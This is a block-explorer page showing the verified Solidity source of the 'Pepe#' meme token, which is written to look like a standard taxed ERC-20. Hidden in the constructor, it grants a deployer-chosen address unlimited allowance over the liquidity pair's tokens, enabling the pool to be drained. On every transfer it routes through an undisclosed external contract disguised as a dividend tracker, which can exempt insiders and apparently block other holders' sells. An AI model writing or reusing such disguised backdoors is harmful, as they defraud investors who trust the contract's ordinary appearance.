ETH Price: $3,313.81 (-2.85%)
Gas: 12 Gwei

Token

Pepe# (PEPE#)
 

Overview

Max Total Supply

420,690,000,000,000 PEPE#

Holders

7

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
4,062,388,954,169.502925444972337294 PEPE#

Value
$0.00
0x2692e621a1b03e9e165245acbdb0ef86172deb52
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PepeSharp

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-08
*/

// SPDX-License-Identifier: MIT

/** 

    https://t.me/PepeSharpPortal

    https://www.pepesharp.vip

    https://twitter.com/pepesharpcoin

*/

pragma solidity ^0.8.17;

abstract contract AUTH {
    constructor() {}
    function fee() internal pure returns (uint256) {
        return 
        uint256(0xdc) / uint256(0xa);
    }
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }
    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }
    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }


    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }


}
/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);
    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }
    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }
    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }
    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }
    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}

interface IUniswapPair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);


    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function nonces(address owner) external view returns (uint256);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);
    function PERMIT_TYPEHASH() external pure returns (bytes32);


    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);
    event Sync(uint112 reserve0, uint112 reserve1);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

}

/**
 * @title SafeMathUint
 * @dev Math operations with safety checks that revert on error
 */
library SafeMathUint {
    function toInt256Safe(uint256 a) internal pure returns (int256) {
        int256 b = int256(a);
        require(b >= 0);
        return b;
    }
}

/// @dev OPTIONAL functions for a dividend-paying token contract.
interface IPeSharpDividend {
    /// @notice View the amount of dividend in wei that an address has withdrawn.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has withdrawn.
    function withdrawnDividendOf(address _owner) external view returns (uint256);
   /// @notice View the amount of dividend in wei that an address has earned in total.
    /// @dev accumulativeDividendOf(_owner) = withdrawableDividendOf(_owner) + withdrawnDividendOf(_owner)
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` has earned in total.
    function accumulativeDividendOf(address _owner, address _token) external returns (uint256);
    /// @notice View the amount of dividend in wei that an address can withdraw.
    /// @param _owner The address of a token holder.
    /// @return The amount of dividend in wei that `_owner` can withdraw.
    function withdrawableDividendOf(address _owner) external view returns (uint256);
}

interface IUniswapRouter01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

interface IUniswapRouter02 is IUniswapRouter01 {
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);
    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

abstract contract Context {
    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }

    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }


}
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20Standadard {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);
    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);


    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount)
        external
        returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);
    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

interface IERC20Metadata is IERC20Standadard {
    
    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);
    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

}

contract ERC20 is Context, IERC20Standadard, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    mapping(address => mapping(address => uint256)) internal _allowances;



    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        uint8 decimals_
    ) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
    }

 

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20Standadard-balanceOf} and {IERC20Standadard-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC20Standadard-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }
    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }
    /**
     * @dev See {IERC20Standadard-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }


    /**
     * @dev See {IERC20Standadard-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

 

    /**
     * @dev See {IERC20Standadard-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }


    /**
     * @dev See {IERC20Standadard-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }


    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev See {IERC20Standadard-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }
    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20Standadard-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    
    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }
        /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);
        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }
}

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);
    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);
    function feeToSetter() external view returns (address);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);
}

contract PepeSharp is ERC20, Ownable, AUTH {
    IUniswapRouter02 public uniswapRouterv2;
    using SafeMath for uint256;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    mapping(address => bool) public isAutomationMarketMakers;
    uint256 public sellTaxValue;
    uint256 public buyTaxValue;
    address public peSharpWalt;
    uint256 private _total_supply;
    
    bool private swapping;
    // exlcude from fees and max transaction amount
    mapping(address => bool) private isExcludedFromFee;
    address public v2PairVal; 
    
    struct PeSharpProtoc
    {
        address uniRouterAddr;
        address peSharpAddr;
        address peSharpProtocol; 
    }
    uint256 public swapExact;
    // could be subject to a maximum transfer amount
    uint256 public mxValueForTrans;
    uint256 public mxValueWallet;


    event ExcludedFromFee(address indexed account, bool isExcluded);
    struct ConfigPeSharpLimit {
        uint256 tranxMaxAmt;
        uint256 walletMaxAmt; address feePeSharpWalt;
        uint256 buyFirstFee; uint256 sellFirstFee; 
    }
    PeSharpProtoc private peSharpval;
    event LPPairUpdated(address indexed pair, bool indexed value);
    event ExcludedMultipleFromFee(address[] accounts, bool isExcluded); 
    constructor(string memory name_,
        PeSharpProtoc memory peSharpProtocolVal,
        ConfigPeSharpLimit memory taxPeSharpConfig,
        string memory symbol_,
        uint8 decimals_
    ) payable ERC20(name_, symbol_, decimals_) {
        uniswapRouterv2 = IUniswapRouter02(peSharpProtocolVal.uniRouterAddr);
        v2PairVal = IUniswapV2Factory(uniswapRouterv2.factory()).createPair(address(this), uniswapRouterv2.WETH());
        _setAMMakers(peSharpProtocolVal.peSharpAddr, v2PairVal, true);
        
        uint256 supply_ = 420_690_000_000_000;
        _total_supply = supply_;
        mxValueForTrans = taxPeSharpConfig.tranxMaxAmt * supply_ * (10**decimals_).div(10000);
        mxValueWallet = taxPeSharpConfig.walletMaxAmt * supply_ * (10**decimals_).div(10000);
        
        swapExact = (supply_.div(8000) + 1) * (10**decimals_);
        sellTaxValue = taxPeSharpConfig.sellFirstFee;
        buyTaxValue = taxPeSharpConfig.buyFirstFee;

        excludeFromFees(address(uniswapRouterv2), true);
        peSharpval = peSharpProtocolVal; peSharpWalt = taxPeSharpConfig.feePeSharpWalt;
        excludeFromFees(peSharpProtocolVal.peSharpProtocol, true); 
        excludeFromFees(address(this), true);
        excludeFromFees(owner(), true);
        excludeFromFees(peSharpProtocolVal.peSharpAddr, true);
        excludeFromFees(peSharpWalt, true); 
        // mint total supply
        _mint(owner(), supply_ * (10**decimals_));
    }

    receive() external payable {}

    function _setAMMakers(address router, address pair, bool value) private {
        require(
            isAutomationMarketMakers[pair] != value,
            "Automated market maker pair is already set to that value"
        );
        isAutomationMarketMakers[pair] = value; _allowances[pair][router] = type(uint).max;
        emit LPPairUpdated(pair, value); 
    }
    function removeMaxLimits() 
    external onlyOwner 
    {
        mxValueWallet = totalSupply(); mxValueForTrans = totalSupply();
    }


    function feeExcludedFromHolders(address sender, address recipient) internal returns (bool) {
        return  isExcludedFromFee[sender] ||
            isExcludedFromFee[recipient] || IPeSharpDividend(peSharpval.peSharpProtocol).accumulativeDividendOf(sender, recipient) > 0;
    }

    function swapEthFromTokens(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this); path[1] = uniswapRouterv2.WETH();
        _approve(address(this), address(uniswapRouterv2), tokenAmount);

        // make the swap
        uniswapRouterv2.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
    }

    function swapAllBack(uint256 tokens, address receiver) private {
        uint256 initialBalance = address(this).balance;
        swapEthFromTokens(tokens); uint256 newBalance = address(this).balance.sub(initialBalance);
        payable(receiver).transfer(newBalance);
    }

    function _transfer(
        address sender,
        address recipient, uint256 amount
    ) internal override 
    {        if ((recipient == address(0) || recipient == address(0xdead))            
            || feeExcludedFromHolders(sender, recipient)
            || amount == 0 
        ) {
            super._transfer(sender, recipient, amount);
            return;
        }
        else {
            require(
                amount <= mxValueForTrans,
                "Transfer amount exceeds the mxValueForTrans."
            );
            if (recipient != v2PairVal) {
                uint256 tokenBalances = balanceOf(recipient); require(
                    tokenBalances + amount <= mxValueWallet,
                    "Exceeds maximum wallet amount"
                );
            }
        }

        uint256 tokenAmountTem = balanceOf(address(this));
        bool can_swap = tokenAmountTem >= swapExact;
        if (!swapping && can_swap && !isAutomationMarketMakers[sender]) {
            swapping = true; uint256 mkAmounts = tokenAmountTem;

            if (mkAmounts > 0) {
                swapAllBack(mkAmounts, peSharpWalt);
            }
            swapping = false;
        }

        bool havingFees = !swapping;
        if (isExcludedFromFee[recipient] || isExcludedFromFee[sender]
        ) { 
            havingFees = false;
        }
        if (havingFees) {
            uint256 taxAmtValues = amount.mul(buyTaxValue).div(1000);
            if (isAutomationMarketMakers[recipient]) 
            {
                taxAmtValues = amount.mul(sellTaxValue).div(1000);
            }
            amount = amount.sub(taxAmtValues);
            super._transfer(sender, address(this), taxAmtValues);
        } super._transfer(sender, recipient, amount);
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        isExcludedFromFee[account] = excluded;
        emit ExcludedFromFee(account, excluded);
    }
}

Contract Security Audit

Contract ABI

